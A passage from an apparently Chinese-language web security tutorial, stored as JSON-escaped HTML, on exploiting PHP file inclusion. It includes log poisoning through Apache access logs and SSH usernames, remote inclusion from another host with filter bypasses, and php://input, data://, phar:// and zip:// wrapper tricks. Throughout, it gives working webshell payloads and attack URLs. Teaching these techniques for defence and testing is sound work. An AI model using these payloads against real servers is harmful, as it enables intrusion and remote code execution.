\/>\n\u5982\u679c\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\u662f\u9ed8\u8ba4\u4f4d\u7f6e\u6216\u8005\u662f\u53ef\u4ee5\u901a\u8fc7\u5176\u4ed6\u65b9\u6cd5\u83b7\u53d6\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7\u8bbf\u95ee\u65e5\u5fd7\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u53bb\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5305\u542b\u65e5\u5fd7\u4e2d\u7684\u6076\u610f\u4ee3\u7801\uff0c\u83b7\u5f97\u6743\u9650\u3002<br \/>\n\u5178\u578b\u7684\u65e5\u5fd7\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n<ul>\n<li>\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/li>\n<li>ssh\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/li>\n<\/ul>\n<h2>\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/h2>\n<p>\u5229\u7528\u6761\u4ef6\uff1a<\/p>\n<ul>\n<li>web\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u7684\u5b58\u50a8\u4f4d\u7f6e\u5df2\u77e5\uff0c\u5e76\u4e14\u5177\u6709\u53ef\u8bfb\u6743\u9650<\/li>\n<\/ul>\n<p>\u4e0b\u9762\u5f00\u59cb\u4ecb\u7ecd\u65e5\u5fd7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5229\u7528\u6b65\u9aa4<\/p>\n<h3>\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6<\/h3>\n<p>\u4e2d\u95f4\u4ef6\u5f00\u542f\u4e86\u8bbf\u95ee\u65e5\u5fd7\u8bb0\u5f55\u529f\u80fd\uff0c\u4f1a\u8bbf\u95ee\u65e5\u5fd7\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u3002<br \/>\n\u5047\u8bbe\u8bbf\u95eeURL\uff1a<a href=\"http:\/\/192.168.1.2\/xxx\/index.php\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/192.168.1.2\/xxx\/index.php<\/a><br \/>\n\u53d1\u73b0\u4f1a\u5728\u65e5\u5fd7\u6587\u4ef6\u4e2d\u6709\u5982\u4e0b\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-csharp\">[root@aaa]#less \/var\/log\/httpd\/access_log\n192.168.1.200 - - [09\/Aug\/2021:19:31:20 +0800] &quot;GET \/xxx\/index.php HTTP\/1.1&quot; 200 86....<\/code><\/pre>\n<p>\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u8bbf\u95ee\u4f1a\u8bb0\u5f55\u8bbf\u95ee\u8005\u7684IP\u5730\u5740\u3001\u8bbf\u95ee\u65f6\u95f4\u3001\u8bbf\u95ee\u8def\u5f84\u3001\u8fd4\u56de\u72b6\u6001\u7801\u7b49\u7b49\u3002<br \/>\n\u5229\u7528\u4e2d\u95f4\u4ef6\u8bbf\u95ee\u8bb0\u5f55\u8def\u5f84\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u7684\u529f\u80fd\uff0c\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u5f53\u4e2d\u53bb\uff1a<br \/>\n\u6dfb\u52a0\u6076\u610f\u4ee3\u7801\uff1a<code>http:\/\/www.abc.com\/xxx\/&lt;?php @eval($_POST[123]);?&gt;<\/code><br \/>\n\u6b64\u65f6\u4f1a\u63d0\u793a404\uff0c\u4f46\u662f\u4e0d\u6025<br \/>\n\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6\uff0c\u53d1\u73b0\u5df2\u7ecf\u5c06\u5185\u5bb9\u5199\u5165<\/p>\n<pre><code class=\"language-perl\">[root@aaa]#less \/var\/log\/httpd\/access_log\n192.168.1.200 - - [09\/Aug\/2021:19:35:23 +0800] &quot;GET \/xxx\/%3C?php @eval($_POST[123]);?%3E HTTP\/1.1&quot; 404 826....<\/code><\/pre>\n<p>\u867d\u7136\u5df2\u7ecf\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u53bb\u4e86\uff0c\u4f46\u662f\u6d4f\u89c8\u5668\u8fdb\u884c\u4e86URL\u7f16\u7801\uff0c\u5bfc\u81f4\u4f20\u5165\u7684\u4ee3\u7801\u4e0d\u80fd\u6b63\u5e38\u4f7f\u7528<br \/>\n<strong>\u53ef\u4ee5\u901a\u8fc7burpsuite\u6293\u5305\u7684\u65b9\u5f0f\u5199\u5165\u6076\u610f\u4ee3\u7801\uff0c\u8fd9\u6837\u4e0d\u4f1a\u88ab\u6d4f\u89c8\u5668\u8fdb\u884cURL\u7f16\u7801<\/strong><br \/>\n\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6\uff0c\u5185\u5bb9\u5982\u4e0b<\/p>\n<pre><code class=\"language-php\">[root@aaa]#less \/var\/log\/httpd\/access_log\n192.168.1.200 - - [09\/Aug\/2021:19:37:33 +0800] &quot;GET \/xxx\/&lt;?php @eval($_POST[123]);?&gt; HTTP\/1.1&quot; 404 302....<\/code><\/pre>\n<p>\u6076\u610f\u4ee3\u7801\u6210\u529f\u5199\u5165<\/p>\n<h3>\u6587\u4ef6\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/h3>\n<p>\u8981\u6267\u884c\u6587\u4ef6\u5305\u542b\uff0c\u5fc5\u987b\u8981\u77e5\u9053\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\u3002<br \/>\n\u5e38\u89c1\u7684\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u90fd\u6709\u9ed8\u8ba4\u7684\u5b58\u50a8\u8def\u5f84\uff0c\u6bd4\u5982Apache\u7684\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u5b58\u5728\/var\/log\/httpd\/\u76ee\u5f55\u4e0b\uff0c\u6587\u4ef6\u540d\u53ebaccess_log<br \/>\n\u8f93\u5165\u6d4b\u8bd5\u8bed\u53e5<code>http:\/\/www.abc.com\/xxx\/file.php?file=..\/..\/..\/var\/log\/httpd\/access_log<\/code><br \/>\n\u4e4b\u540e\u5728\u5411\u7f51\u9875\u4f20\u5165POST\u53c2\u6570\uff1a<code>123=phpinfo<\/code><br \/>\n\u5373\u53ef\u663e\u793a\u51faphpinfo\u7684\u5185\u5bb9<\/p>\n<h2>SSH\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/h2>\n<p>SSH\u65e5\u5fd7\u6587\u4ef6\u5305\u542b\u7684\u5229\u7528\u6761\u4ef6\u662f\uff1a<\/p>\n<ul>\n<li>SSH\u65e5\u5fd7\u8def\u5f84\u5df2\u77e5\uff0c\u5e76\u4e14\u5177\u6709\u53ef\u8bfb\u6743\u9650<\/li>\n<\/ul>\n<p>SSH\u65e5\u5fd7\u6587\u4ef6\u7684\u9ed8\u8ba4\u8def\u5f84\u4e3a<code>\/var\/log\/auth.log<\/code><\/p>\n<p>\u4e0b\u9762\u4ecb\u7ecd\u6f0f\u6d1e\u5229\u7528\u6b65\u9aa4<\/p>\n<h3>\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u6587\u4ef6<\/h3>\n<p>SSH\u5982\u679c\u5f00\u542f\u4e86\u65e5\u5fd7\u8bb0\u5f55\u7684\u529f\u80fd\uff0c\u90a3\u4e48\u4f1a\u5c06ssh\u7684\u8fde\u63a5\u65e5\u5fd7\u8bb0\u5f55\u5230ssh\u65e5\u5fd7\u6587\u4ef6\u5f53\u4e2d<br \/>\n\u5c06\u8fde\u63a5\u7684\u7528\u6237\u540d\u8bbe\u7f6e\u6210\u6076\u610f\u4ee3\u7801\uff0c\u7528\u547d\u4ee4\u8fde\u63a5\u670d\u52a1\u5668192.168.1.1\u7684ssh\u670d\u52a1<br \/>\n<code>ssh &quot;&lt;?php @eval($_POST[123]);?&gt;&quot;@192.168.1.1<\/code><br \/>\n\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6\/var\/log\/auth.log\uff0c\u53ef\u4ee5\u89c2\u5bdf\u5230\u6076\u610f\u4ee3\u7801\u5df2\u7ecf\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6<\/p>\n<h3>\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/h3>\n<p>\u6d4b\u8bd5\u8f93\u5165\u8bed\u53e5\uff1a<code>http:\/\/192.168.1.1\/xxx\/file.php?file=..\/..\/..\/var\/log\/auth.log<\/code><br \/>\n\u4e4b\u540e\u518d\u5411\u7f51\u9875\u4f20\u5165POST\u53c2\u6570\uff1a<code>123=phpinfo<\/code><br \/>\n\u5c31\u53ef\u4ee5\u51fa\u73b0phpinfo\u7684\u5185\u5bb9\u4e86<\/p>\n<h2>\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/h2>\n<h3>\u65e0\u9650\u5236\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/h3>\n<p>\u65e0\u9650\u5236\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u662f\u6307\u5305\u542b\u6587\u4ef6\u7684\u4f4d\u7f6e\u5e76\u4e0d\u5728\u672c\u5730\u670d\u52a1\u5668\uff0c\u800c\u662f\u901a\u8fc7URL\u7684\u5f62\u5f0f\u5305\u542b\u5230\u5176\u4ed6\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\uff0c\u4ee5\u53ca\u6267\u884c\u6587\u4ef6\u4e2d\u7684\u6076\u610f\u4ee3\u7801<br \/>\n\u6f0f\u6d1e\u5229\u7528\u7684\u6761\u4ef6\u662f\uff1a<\/p>\n<pre><code class=\"language-ini\">allow_url_fopen=on\nallow_url_include=on<\/code><\/pre>\n<p>\u65e0\u9650\u8fdc\u7a0b\u6267\u884c\u6587\u4ef6\u7684\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include $file;\n?&gt;<\/code><\/pre>\n<p>\u8bbe\u5b9a\u4e00\u4e2a\u6587\u4ef6\uff1aphp.txt \u7684\u5185\u5bb9\u4e3a<code>&lt;?php phpinfo();?&gt;<\/code><br \/>\n\u5728\u6b63\u5e38\u60c5\u51b5\u4e0b\u8bbf\u95ee\u8fdc\u7a0b\u670d\u52a1\u5668URL\uff0c<code>http:\/\/192.168.2.1\/php.txt<\/code><br \/>\n\u5305\u542b\u5728php.txt\u4e2d\u7684phpinfo\u51fd\u6570\u4e0d\u4f1a\u5f53\u505aPHP\u4ee3\u7801\u6267\u884c\uff0c\u4f46\u662f\u901a\u8fc7\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5305\u542b\u5728php.txt\u7684phpinfo\u51fd\u6570\u4f1a\u88ab\u5f53\u505aPHP\u4ee3\u7801\u6267\u884c<br \/>\n<code>http:\/\/www.abc.com\/file.php?file=http:\/\/192.168.2.1\/php.txt<\/code><\/p>\n<h3>\u6709\u9650\u5236\u7684\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/h3>\n<p>\u6709\u9650\u5236\u7684\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u662f\u4ee3\u7801\u4e2d\u5b58\u5728\u7279\u5b9a\u7684\u524d\u7f00\u548c\u540e\u7f00.php \/.html \u7b49\u62d3\u5c55\u540d\u8fc7\u6ee4\u7684\u65f6\u5019\uff0c\u653b\u51fb\u8005\u9700\u8981\u7ed5\u8fc7\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\u8fc7\u6ee4\uff0c\u624d\u80fd\u8fdc\u7a0b\u6267\u884cURL\u4ee3\u7801<br \/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b<\/p>\n<pre><code class=\"language-php\">    include($_GET[&#039;filename&#039;].&quot;.html&quot;);<\/code><\/pre>\n<p>\u901a\u5e38\u6709\u9650\u5236\u7684\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u53ef\u4ee5\u901a\u8fc7\u95ee\u53f7\u3001\u4e95\u53f7\u3001\u7a7a\u683c\u7ed5\u8fc7<\/p>\n<h4>\u901a\u8fc7\u95ee\u53f7\u7ed5\u8fc7<\/h4>\n<p>\u53ef\u4ee5\u5728\u95ee\u53f7\u540e\u9762\u6dfb\u52a0html\u5b57\u7b26\u4e32\uff0c\u95ee\u53f7\u540e\u9762\u7684\u62d3\u5c55\u540d\u4f1a\u88ab\u5f53\u505a\u67e5\u8be2\uff0c\u4ece\u800c\u7ed5\u8fc7\u8fc7\u6ee4<br \/>\n<code>http:\/\/www.abc.com\/file.php?filename=http:\/\/192.168.2.1\/php.txt?<\/code><\/p>\n<h4>\u901a\u8fc7\u4e95\u53f7\u7ed5\u8fc7<\/h4>\n<p>\u53ef\u4ee5\u5728#\u540e\u9762\u6dfb\u52a0HTML\u5b57\u7b26\u4e32\uff0c#\u4f1a\u622a\u65ad\u540e\u9762\u7684\u62d3\u5c55\u540d\uff0c\u4ece\u800c\u7ed5\u8fc7\u62d3\u5c55\u540d\u8fc7\u6ee4.#\u7684URL\u7f16\u7801\u4e3a%23<br \/>\n<code>http:\/\/www.abc.com\/file.php?filename=http:\/\/192.168.2.1\/php.txt%23<\/code><\/p>\n<h4>\u901a\u8fc7\u7a7a\u683c\u7ed5\u8fc7<\/h4>\n<pre><code>http:\/\/www.abc.com\/file.php?filename=http:\/\/192.168.2.1\/php.txt%20<\/code><\/pre>\n<h1>PHP \u4f2a\u534f\u8bae<\/h1>\n<p>PHP\u5e26\u6709\u5f88\u591a\u5185\u7f6e\u7684URL\u98ce\u683c\u7684\u5c01\u88c5\u534f\u8bae\uff0c\u53ef\u7528\u4e8e fopen\\copy\\file_exists\\filesize\u7b49\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570<br \/>\n\u5e38\u89c1\u7684PHP\u4f2a\u534f\u8bae\u5982\u4e0b\uff1a<\/p>\n<ul>\n<li>file:\/\/ \u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7cfb\u7edf<\/li>\n<li>http:\/\/ \u8bbf\u95eehttp\uff08s\uff09\u7f51\u5740<\/li>\n<li>ftp:\/\/ \u8bbf\u95eeftp\uff08s)URL<\/li>\n<li>php:\/\/ \u8bbf\u95ee\u5404\u4e2a\u8f93\u5165\u8f93\u51fa\u6d41<\/li>\n<li>zlib:\/\/ \u5904\u7406\u538b\u7f29\u6d41<\/li>\n<li>data:\/\/ \u8bfb\u53d6\u6570\u636e<\/li>\n<li>glob:\/\/ \u627e\u67e5\u5339\u914d\u7684\u6587\u4ef6\u8def\u5f84\u6a21\u5f0f<\/li>\n<li>phar:\/\/ PHP\u5f52\u6863<\/li>\n<li>ssh2:\/\/ Secure Shell 2<\/li>\n<li>rar:\/\/ RAR\u5904\u7406\u538b\u7f29\u6570\u636e<\/li>\n<li>ogg:\/\/ \u5904\u7406\u97f3\u9891\u6d41<\/li>\n<li>expect:\/\/ \u5904\u7406\u4ea4\u4e92\u5f0f\u7684\u6d41<\/li>\n<\/ul>\n<h2>php:\/\/\u4f2a\u534f\u8bae<\/h2>\n<h3>php:\/\/filter<\/h3>\n<p>php:\/\/filter \u662f\u5143\u5c01\u88c5\u5668\uff0c\u8bbe\u8ba1\u7528\u4e8e\u6570\u636e\u6d41\u6253\u5f00\u65f6\u7b5b\u9009\u8fc7\u6ee4\u5e94\u7528\uff0c\u5bf9\u672c\u5730\u78c1\u76d8\u6587\u4ef6\u8fdb\u884c\u8bfb\u5199<br \/>\n\u4ee5\u4e0b\u4e24\u79cd\u7528\u6cd5\u76f8\u540c<br \/>\n<code>?filename=php:\/\/filter\/read=convert.base64-encode\/resource=xxx.php<\/code><br \/>\n<code>?filename=php:\/\/filter\/convert.base64-encode\/resource=xxx.php<\/code><br \/>\n\u4f7f\u7528php:\/\/filter allow_url_fopen\u548callow_url_include\u4e0d\u9700\u8981\u5f00\u542f<\/p>\n<table>\n<thead>\n<tr>\n<th>\u524d\u7f00\u540d\u79f0<\/th>\n<th>\u540e\u52a0\u5185\u5bb9<\/th>\n<th>\u63cf\u8ff0<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>resource=<\/td>\n<td>\u8981\u8fc7\u6ee4\u7684\u6570\u636e\u6d41<\/td>\n<td>\u6307\u5b9a\u8981\u8fc7\u6ee4\u7684\u6570\u636e\u6d41<\/td>\n<\/tr>\n<tr>\n<td>read=<\/td>\n<td>\u8bfb\u94fe\u7684\u7b5b\u9009\u5668\u5217\u8868<\/td>\n<td>\u53c2\u6570\u53ef\u9009\uff0c\u53ef\u8bbe\u5b9a\u4e00\u4e2a\u6216\u8005\u591a\u4e2a\u7b5b\u9009\u5668\u540d\u79f0\uff0c\u4ee5\u7ba1\u9053\u7b26\uff08|\uff09\u5206\u9694<\/td>\n<\/tr>\n<tr>\n<td>write=<\/td>\n<td>\u5199\u94fe\u7684\u7b5b\u9009\u5668\u5217\u8868<\/td>\n<td>\u53c2\u6570\u53ef\u9009\uff0c\u53ef\u8bbe\u5b9a\u4e00\u4e2a\u6216\u8005\u591a\u4e2a\u7b5b\u9009\u5668\u540d\u79f0\uff0c\u4ee5\u7ba1\u9053\u7b26\uff08|\uff09\u5206\u9694<\/td>\n<\/tr>\n<tr>\n<td>\u7a7a<\/td>\n<td>\u4e24\u4e2a\u94fe\u7684\u7b5b\u9009\u5668\u5217\u8868<\/td>\n<td>\u6ca1\u6709\u7528read=\u6216\u8005write=\u505a\u524d\u7f00\u7684\u7b5b\u9009\u5668\u5217\u8868\u4f1a\u662f\u8f7b\u5feb\u5e94\u7528\u4e8e\u8bfb\u6216\u8005\u5199<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u8fd9\u6837\u6587\u4ef6\u4f1a\u4ee5base64\u7684\u7f16\u7801\u6253\u5f00\uff0c\u4f7f\u7528python\u89e3\u7801\u5373\u53ef<\/p>\n<pre><code class=\"language-python\">import base64\nprint(base64.b64decode(&quot;.........&quot;))<\/code><\/pre>\n<h3>php:\/\/input<\/h3>\n<p>php:\/\/input\u53ef\u4ee5\u8bbf\u95ee\u8bf7\u6c42\u7684\u539f\u59cb\u6570\u636e\u7684\u53ea\u8bfb\u6d41\uff0c\u5373\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6POST\u4e0a\u6ca1\u6709\u7ecf\u8fc7\u89e3\u6790\u7684\u539f\u59cb\u6570\u636e\uff0c\u4f46\u662f\u4f7f\u7528enctype=&quot;multipart\/form-data&quot;\u7684\u65f6\u5019php:\/\/input\u662f\u65e0\u6548\u7684\u3002<br \/>\nphp:\/\/input\u6709\u4ee5\u4e0b\u4e09\u79cd\u7528\u6cd5<\/p>\n<h4>\u8bfb\u53d6POST\u6570\u636e<\/h4>\n<p>php:\/\/input\u53ef\u4ee5\u8bfb\u53d6POST\u4e0a\u6ca1\u6709\u7ecf\u8fc7\u89e3\u6790\u7684\u539f\u59cb\u6570\u636e<br \/>\n\u5229\u7528php:\/\/input \u8bfb\u53d6POST\u6570\u636e\u7684\u65f6\u5019\uff0callow_url_fopen\u548callow_url_include\u4e0d\u9700\u8981\u5f00\u542f<br \/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b<\/p>\n<pre><code class=\"language-php\">    echo file_get_contents(&quot;php:\/\/input&quot;);<\/code><\/pre>\n<p>\u4e0a\u9762\u4ee3\u7801\u8f93\u51fafile_get_contents\u51fd\u6570\u83b7\u53d6\u7684php:\/\/input\u6570\u636e\u3002<br \/>\n\u6d4b\u8bd5\u65f6\u4f20\u5165POST\u6570\u636e\u5b57\u7b26\u4e32test<br \/>\n\u6700\u540e\u4f1a\u5728\u9875\u9762\u56de\u663e\u51fatest<\/p>\n<h4>\u5199\u5165\u6728\u9a6c<\/h4>\n<p>\u5229\u7528php:\/\/input\u5199\u5165\u6728\u9a6c\u7684\u65f6\u5019\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u53ea\u9700\u8981\u5f00\u542fallow_url_include<br \/>\n\u5982\u679cPOST\u4f20\u5165\u7684\u662fPHP\u4ee3\u7801\uff0c\u5c31\u53ef\u4ee5\u5199\u5165\u6728\u9a6c<br \/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u5982\u679cPOST\u4f20\u5165\u7684\u662f\u4e00\u4e2a\u6267\u884c\u5199\u5165\u6728\u9a6c\u7684PHP\u4ee3\u7801\uff0c\u5c31\u4f1a\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u5199\u5165\u4e00\u4e2a\u6728\u9a6c\uff0c\u901a\u8fc7POST\u65b9\u6cd5\u4f20\u5165\u7684\u662f\u4ee5\u4e0b\u4ee3\u7801<br \/>\n<code>&lt;?php fputs(fopen(&#039;shell.php&#039;,&#039;w&#039;),&#039;&lt;?php @eval($_POST[cmd])?&gt;&#039;);?&gt;<\/code><br \/>\n\u5229\u7528php:\/\/input\u4f20\u5165\u6728\u9a6c\u7684PHP\u4ee3\u7801<br \/>\n<code>http&quot;\/\/www.abc.com\/xxx\/file.php?file=php:\/\/input<\/code><br \/>\n\u6d4b\u8bd5\u7684\u7ed3\u679c\u5c31\u662f\u901a\u8fc7php:\/\/input\u4f20\u5165\u4e86\u8fd9\u4e2a\u4ee3\u7801\uff0c\u5e76\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u5efa\u7acb\u4e86shell.php\u6587\u4ef6<\/p>\n<h4>\u6267\u884c\u547d\u4ee4<\/h4>\n<p>\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u5229\u7528php:\/\/input\u6267\u884c\u547d\u4ee4\u7684\u65f6\u5019\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u53ea\u9700\u8981\u5f00\u542fallow_url_include<br \/>\n\u5982\u679cPOST\u4f20\u5165\u7684\u662fPHP\u4ee3\u7801\uff0c\u5c31\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u5982\u679c\u6b64\u65f6PHP\u4ee3\u7801\u8c03\u7528\u4e86\u7cfb\u7edf\u51fd\u6570\uff0c\u5c31\u53ef\u4ee5\u6267\u884c\u8be5\u547d\u4ee4<br \/>\n\u6bd4\u5982\u4f20\u5165POST\u53c2\u6570<br \/>\n<code>&lt;?php system(&#039;ls&#039;);?&gt;<\/code><\/p>\n<h2>file: \/\/\u4f2a\u534f\u8bae<\/h2>\n<p>file:\/\/ \u53ef\u4ee5\u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7cfb\u7edf\uff0c\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u7684\u5185\u5bb9<br \/>\n\u4f7f\u7528file:\/\/ \u4e0d\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include<br \/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u53ef\u4ee5\u8f93\u5165\u4ee5\u4e0bURL<br \/>\n<code>http:\/\/www.abc.com\/xxx\/file.php?file=file:\/\/c:\/boot.ini<\/code><br \/>\n\u8fd9\u4e2a\u547d\u4ee4\u5c31\u53ef\u4ee5\u8d77\u5230\u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7684\u76ee\u7684<\/p>\n<h2>data:\/\/ \u4f2a\u534f\u8bae<\/h2>\n<p>\u4ecePHP5.2.0\u8d77\uff0c\u6570\u636e\u5c01\u88c5\u6d41\u5c31\u5f00\u59cb\u6709\u6548\uff0c\u7528\u4e8e\u6570\u636e\u6d41\u7684\u8bfb\u53d6\u3002<br \/>\n\u5982\u679c\u4f20\u5165\u7684\u90fd\u662fPHP\u4ee3\u7801\uff0c\u5c31\u4f1a\u6267\u884c\u4efb\u610f\u4ee3\u7801<br \/>\n\u4f7f\u7528\u65b9\u6cd5\u5982\u4e0b<br \/>\n<code>data:\/\/text\/plain;base64,xxxxx(base64\u7f16\u7801\u540e\u7684\u6570\u636e)<\/code><br \/>\n<strong>\u5229\u7528data:\/\/ \u65f6\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include<\/strong><br \/>\n\u4ee3\u7801\u793a\u4f8b\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u901a\u8fc7data:\/\/ \u4f2a\u534f\u8bae\u4f20\u9001phpinfo\u4ee3\u7801\uff0c<code>&lt;?php phpinfo();?&gt;<\/code>\u7684base64\u7f16\u7801\u4e3aPD9waHAgcGhwaW5mbygpOz8+\uff0c\u9700\u8981\u5bf9\u52a0\u53f7\u8fdb\u884cURL\u7f16\u7801\uff1a%2b<br \/>\n\u6700\u7ec8\u8f93\u5165\u7684data\u6570\u636e\u662f\uff1a<br \/>\n<code>data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<\/code><br \/>\n\u4f20\u5165\u5230URL\u5c31\u662f<br \/>\n<code>http:\/\/www.abc.com\/xxx\/file.php?file=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<\/code><\/p>\n<h2>phar:\/\/\u4f2a\u534f\u8bae<\/h2>\n<p>phar:\/\/ \u662f\u7528\u6765\u89e3\u538b\u7684\u4f2a\u534f\u8bae<br \/>\nphar:\/\/\u4e0d\u7ba1\u53c2\u6570\u4e2d\u662f\u4ec0\u4e48\u62d3\u5c55\u540d\uff0c\u90fd\u4f1a\u88ab\u5f53\u505a\u538b\u7f29\u5305<br \/>\n\u7528\u6cd5\uff1a<code>?file=phar:\/\/\u538b\u7f29\u5305\/\u538b\u7f29\u6587\u4ef6<\/code><br \/>\n\u6bd4\u5982\uff1a<code>phar:\/\/xxx.png\/shell.php<\/code><br \/>\n<strong>\u5229\u7528phar:\/\/ \u65f6\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include\uff0c\u5e76\u4e14PHP\u7248\u672c\u8981\u9ad8\u4e8e5.3.0<\/strong><\/p>\n<blockquote>\n<p>\u6ce8\u610f\uff1a\u538b\u7f29\u5305\u9700\u8981\u7528zip:\/\/\u4f2a\u534f\u8bae\u538b\u7f29\u800c\u4e0d\u80fd\u7528rar:\/\/\uff0c\u5c06\u6728\u9a6c\u6587\u4ef6\u538b\u7f29\u540e\uff0c\u6539\u6210\u4efb\u610f\u540e\u7f00\u540d\u90fd\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528<\/p>\n<\/blockquote>\n<p>\u4ee3\u7801\u793a\u4f8b\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u5199\u4e00\u4e2a\u6728\u9a6c\u6587\u4ef6shell.php\uff0c\u7136\u540e\u7528zip:\/\/\u4f2a\u534f\u8bae\u538b\u7f29\u6210shell.zip\uff0c\u6700\u540e\u4fee\u6539\u540e\u7f00\u540d\u4e3a.png\uff0c\u4e0a\u4f20\u56fe\u7247<br \/>\n\u8f93\u5165\u6d4b\u8bd5\uff1a<code>http:\/\/www.abc.com\/xxx\/file.php?file=phar:\/\/shell.png\/shell.php<\/code><\/p>\n<p>\u8fd9\u6837phar:\/\/\u5c31\u4f1a\u5c06png\u5f53\u505azip\u538b\u7f29\u5305\u8fdb\u884c\u89e3\u538b\uff0c\u5e76\u4e14\u8bbf\u95ee\u89e3\u538b\u540e\u7684shell.php\u6587\u4ef6<\/p>\n<h2>zip:\/\/ \u4f2a\u534f\u8bae<\/h2>\n<p>\u548cphar:\/\/\u4f2a\u534f\u8bae\u539f\u7406\u7c7b\u4f3c\uff0c\u4f46\u7528\u6cd5\u4e0d\u540c<br \/>\n\u7528\u6cd5\uff1a<code>?file=zip:\/\/[\u538b\u7f29\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84]#[\u538b\u7f29\u6587\u4ef6\u5185\u7684\u5b50\u6587\u4ef6\u540d]<\/code><br \/>\n<strong>\u5229\u7528zip:\/\/ \u65f6\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include\uff0c\u5e76\u4e14PHP\u7248\u672c\u8981\u9ad8\u4e8e5.3.0<\/strong><\/p>\n<blockquote>\n<p>\u6ce8\u610f\uff1a\u9700\u8981\u5c06#\u8f6c\u6362\u6210URL\u7f16\u7801\uff1a%23<\/p>\n<\/blockquote>\n<p>\u4ee3\u7801\u793a\u4f8b\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u8f93\u5165\u6d4b\u8bd5\uff1a<code>http:\/\/www.abc.com\/xxx\/file?file=zip:\/\/D:\/phpstudy\/www\/...\/test.png%23shell.php 